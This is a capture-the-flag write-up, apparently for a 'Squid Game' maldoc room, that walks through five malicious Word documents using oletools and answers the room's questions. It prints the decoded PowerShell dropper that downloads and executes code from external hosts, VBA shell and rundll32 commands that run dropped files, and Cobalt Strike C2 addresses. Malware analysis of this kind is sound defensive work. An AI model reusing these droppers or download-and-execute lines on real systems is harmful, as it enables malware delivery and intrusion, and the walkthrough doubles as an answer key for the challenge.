Squid Game

Attacker 1

01. What is the malicious C2 domain you found in the maldoc where an executable download was attempted?

We will analyze this document by using oletools.

$ oledump.py attacker1.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:     13859 '1Table'
  5:     33430 'Data'
  6:       365 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    9852 'Macros/VBA/ThisDocument'
  9:      5460 'Macros/VBA/_VBA_PROJECT'
 10:       513 'Macros/VBA/dir'
 11:       306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
 12:       341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
 13:      4096 'WordDocument'

You will find obfuscated script from this document. At this stage, we can't do anything.

$ oledump.py -s 8 -v attacker1.doc 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)
.......

Try to upload to https://hybrid-analysis.com/. We will find detail background command from this report https://hybrid-analysis.com/sample/2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e/618d7f92e234d60f96658a08.

We will decode this encoded base64.

$ echo 'JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= ' | base64 -d
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){

  if($m.Name -eq "DownloadString"){
    try{
     $uri = New-Object System.Uri("http://176.32.35.16/704e.php")
     IEX($m.Invoke($instance, ($uri)));
    }catch{}

  }

  if($m.Name -eq "DownloadData"){
     try{
     $uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas")
     $response = $m.Invoke($instance, ($uri));

     $path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
     [System.IO.File]::WriteAllBytes($path, $response);

     $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
     $type = [Type]::GetTypeFromCLSID($clsid)
     $object = [Activator]::CreateInstance($type)
     $object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)

     }catch{}
     
  }
}

Exit;

02. What executable file is the maldoc trying to drop?

$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
[System.IO.File]::WriteAllBytes($path, $response);

03. In what folder is it dropping the malicious executable? (hint: %Folder%)

Try to search GetFolderPath("CommonApplicationData") on google. Here is a link that I found answer - https://stackoverflow.com/questions/895723/environment-getfolderpath-commonapplicationdata-is-still-returning-c-docum

%ProgramData%

04. Provide the name of the COM object the maldoc is trying to access.

Try to search $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880' on google. Here is a link that I found answer - https://strontic.github.io/xcyclopedia/library/clsid_c08afd90-f2a1-11d1-8455-00a0c91f3880.html

ShellBrowserWindows

05. Include the malicious IP and the php extension found in the maldoc. (Format: IP/name.php)

176.32.35.16/704e.php

06. Find the phone number in the maldoc. (Answer format: xxx-xxx-xxxx)

$ strings attacker1.doc
.....
Networked multi-state projection
West Virginia  Samanta
213-446-1757 x7135
Re-contextualized radical service-desk
Normal
 Windows
......

07. Doing some static analysis, provide the type of maldoc this is under the keyword "AutoOpen".

$ olevba -a attacker1.doc 
olevba 0.56 on Python 3.6.9 - http://decalage.info/python/oletools
===============================================================================
FILE: attacker1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: attacker1.doc - OLE stream: 'Macros/VBA/ThisDocument'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|ChrW                |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

08. Provide the subject for this maldoc. (make sure to remove the extra whitespace)

$ file attacker1.doc 
attacker1.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Networked multi-state projection, Subject: West Virginia  Samanta, Author: 213-446-1757 x7135, Comments: Re-contextualized radical service-desk, Template: Normal, Last Saved By:  Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Feb  7 23:45:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0

09. Provide the stream number that contains a macro.

$ oletimes attacker1.doc 
oletimes 0.54 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
FILE: attacker1.doc

+----------------------------+---------------------+---------------------+
| Stream/Storage name        | Modification Time   | Creation Time       |
+----------------------------+---------------------+---------------------+
| Root                       | 2019-02-07 23:45:30 | None                |
| '\x01CompObj'              | None                | None                |
| '\x05DocumentSummaryInform | None                | None                |
| ation'                     |                     |                     |
| '\x05SummaryInformation'   | None                | None                |
| '1Table'                   | None                | None                |
| 'Data'                     | None                | None                |
| 'Macros'                   | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'Macros/PROJECT'           | None                | None                |
| 'Macros/PROJECTwm'         | None                | None                |
| 'Macros/VBA'               | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'Macros/VBA/ThisDocument'  | None                | None                |
| 'Macros/VBA/_VBA_PROJECT'  | None                | None                |
| 'Macros/VBA/dir'           | None                | None                |
| 'MsoDataStore'             | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| ÛÎIS2BKÍÐÐ=='              |                     |                     |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | None                | None                |
| ÛÎIS2BKÍÐÐ==/Item'         |                     |                     |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | None                | None                |
| ÛÎIS2BKÍÐÐ==/Properties'   |                     |                     |
| 'WordDocument'             | None                | None                |
+----------------------------+---------------------+---------------------+

10. Provide the stream number that contains a macro.

$ oledump.py attacker1.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:     13859 '1Table'
  5:     33430 'Data'
  6:       365 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    9852 'Macros/VBA/ThisDocument'
  9:      5460 'Macros/VBA/_VBA_PROJECT'
 10:       513 'Macros/VBA/dir'
 11:       306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
 12:       341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
 13:      4096 'WordDocument'

11. Provide the name of the stream that contains a macro.

8: M    9852 'Macros/VBA/ThisDocument'

Attacker 2

01. Provide the streams (numbers) that contain macros.

$ oledump.py attacker2.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      7427 '1Table'
  5:     63641 'Data'
  6:        97 'Macros/Form/\x01CompObj'
  7:       283 'Macros/Form/\x03VBFrame'
  8:     63528 'Macros/Form/f'
  9:      2220 'Macros/Form/o'
 10:       566 'Macros/PROJECT'
 11:        92 'Macros/PROJECTwm'
 12: M    6655 'Macros/VBA/Form'
 13: M   15671 'Macros/VBA/Module1'
 14: M    1593 'Macros/VBA/ThisDocument'
 15:     42465 'Macros/VBA/_VBA_PROJECT'
 16: M    2724 'Macros/VBA/bxh'
 17:      1226 'Macros/VBA/dir'
 18:      4096 'WordDocument'

02. Provide the size (bytes) of the compiled code for the second stream that contains a macro.

$ oledump.py attacker2.doc -i
  1:       114             '\x01CompObj'
  2:      4096             '\x05DocumentSummaryInformation'
  3:      4096             '\x05SummaryInformation'
  4:      7427             '1Table'
  5:     63641             'Data'
  6:        97             'Macros/Form/\x01CompObj'
  7:       283             'Macros/Form/\x03VBFrame'
  8:     63528             'Macros/Form/f'
  9:      2220             'Macros/Form/o'
 10:       566             'Macros/PROJECT'
 11:        92             'Macros/PROJECTwm'
 12: M    6655   4978+1677 'Macros/VBA/Form'
 13: M   15671  13867+1804 'Macros/VBA/Module1'
 14: M    1593    1396+197 'Macros/VBA/ThisDocument'
 15:     42465             'Macros/VBA/_VBA_PROJECT'
 16: M    2724    2397+327 'Macros/VBA/bxh'
 17:      1226             'Macros/VBA/dir'
 18:      4096             'WordDocument'

03. Provide the largest number of bytes found while analyzing the streams.

5:     63641             'Data'

04. Find the command located in the 'fun' field ( make sure to reverse the string).

$ oledump.py -s 16 -v attacker2.doc | grep fun | rev
))84(rhC ,)"cmd /k cscript.exe C:\ProgramData\pin.vbs"(esreveRrtS(llehS = nuf

05. Provide the first domain found in the maldoc.

priyacareers.com/u9hDQN9Yy7g/pt.html

06. Provide the second domain found in the maldoc.

perfectdemos.com/Gv1iNAuMKZ/pt.html

07. Provide the name of the first malicious DLL it retrieves from the C2 server.

www1.dll

08. How many DLLs does the maldoc retrieve from the domains?

5

09. Provide the path of where the malicious DLLs are getting dropped onto?

You can also view using olevba

$ oledump.py -s 16 -v attacker2.doc 
Attribute VB_Name = "bxh"
Sub eFile()
Dim QQ1 As Object
Set QQ1 = New Form
RO = StrReverse("\ataDmargorP\:C")
ROI = RO + StrReverse("sbv.nip")
ii = StrReverse("")
Ne = StrReverse("IZOIZIMIZI")
WW = QQ1.t2.Caption
MyFile = FreeFile
Open ROI For Output As #MyFile
Print #MyFile, WW
Close #MyFile
fun = Shell(StrReverse("sbv.nip\ataDmargorP\:C exe.tpircsc k/ dmc"), Chr(48))
End
End Sub

10. What program is it using to run DLLs?

$ olevba attacker2.doc
......
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
Ran.Run OK1, Chr(48)
OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr"
Ran.Run OK2, Chr(48)
OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr"
Ran.Run OK3, Chr(48)
OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr"
Ran.Run OK4, Chr(48)
OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr"
Ran.Run OK5, Chr(48)

11. How many seconds does the function in the maldoc sleep for to fully execute the malicious DLLs?

WScript.Sleep(15000)
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
Ran.Run OK1, Chr(48)

12. Under what stream did the main malicious script use to retrieve DLLs from the C2 domains? (Provide the name of the stream).

Macros/Form/o

Attacker 3

01. Provide the executable name being downloaded.

1.exe

02. What program is used to run the executable?

$ oledump.py -s 3 -v  attacker3.doc 
Attribute VB_Name = "T"
Sub autoopen()
LG = h("12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77")

Dim XN As New WshShell
Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)
Call XN.run(LG, 0)

End Sub

03. Provide the malicious URI included in the maldoc that was used to download the binary (without http/https).

8cfayv.com/bolb/jaent.php?l=liut6.cab

04. What folder does the binary gets dropped in?

Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)

05. Which stream executes the binary that was downloaded?

$ oledump.py attacker3.doc 
A: word/vbaProject.bin
 A1:       423 'PROJECT'
 A2:        53 'PROJECTwm'
 A3: M    2017 'VBA/T'
 A4: m    1127 'VBA/ThisDocument'
 A5:      2976 'VBA/_VBA_PROJECT'
 A6:      1864 'VBA/__SRP_0'
 A7:       190 'VBA/__SRP_1'
 A8:       348 'VBA/__SRP_2'
 A9:       106 'VBA/__SRP_3'
A10: M    1291 'VBA/d'
A11:       723 'VBA/dir'

Attacker 4

01. Provide the first decoded string found in this maldoc.

First we need to analyze using olevba.

$ olevba attacker4.doc
......
 Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
......

Change Hex Format and then decrypt xor with key.

MSXML2.XMLHTTP

02. Provide the name of the binary being dropped.

    ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub

03. Provide the folder where the binary is being dropped to.

    ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub

04. Provide the name of the second binary.

Sub IOWZJGNTSGK()
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))

05. Provide the full URI from which the second binary was downloaded (exclude http/https).

Sub IOWZJGNTSGK()
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))

Attacker 5

01. What is the caption you found in the maldoc?

$ strings attacker5.doc
MeIfYouCan 
   Caption         =   "CobaltStrikeIsEverywhere"
   ClientHeight    =   3015
   ClientLeft      =   120
   ClientTop       =   465
   ClientWidth     =   4560
   StartUpPosition =   1  'CenterOwner
   TypeInfoVer     =   2

02. What is the XOR decimal value found in the decoded-base64 script?

Firstly, dump with olevba. And then you will see base64 format and decode it. You need to remove . and space. And then again, we get another base64.

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

03. Provide the C2 IP address of the Cobalt Strike server.

Decrypt again!

176.103.56.89

04. Provide the full user-agent found.

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

05. Provide the path value for the Cobalt Strike shellcode.

/SjMR

06. Provide the port number of the Cobalt Strike C2 Server.

8080

07. Provide the first two APIs found.

$ scdbgc -f '/home/remnux/Desktop/tryhackme/maldocs/download.dat' 
Loaded 31e bytes from file /home/remnux/Desktop/tryhackme/maldocs/download.dat
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

4010a2	LoadLibraryA(wininet)
4010b0	InternetOpenA()
4010cc	InternetConnectA(server: 176.103.56.89, port: 8080, )

Stepcount 2000001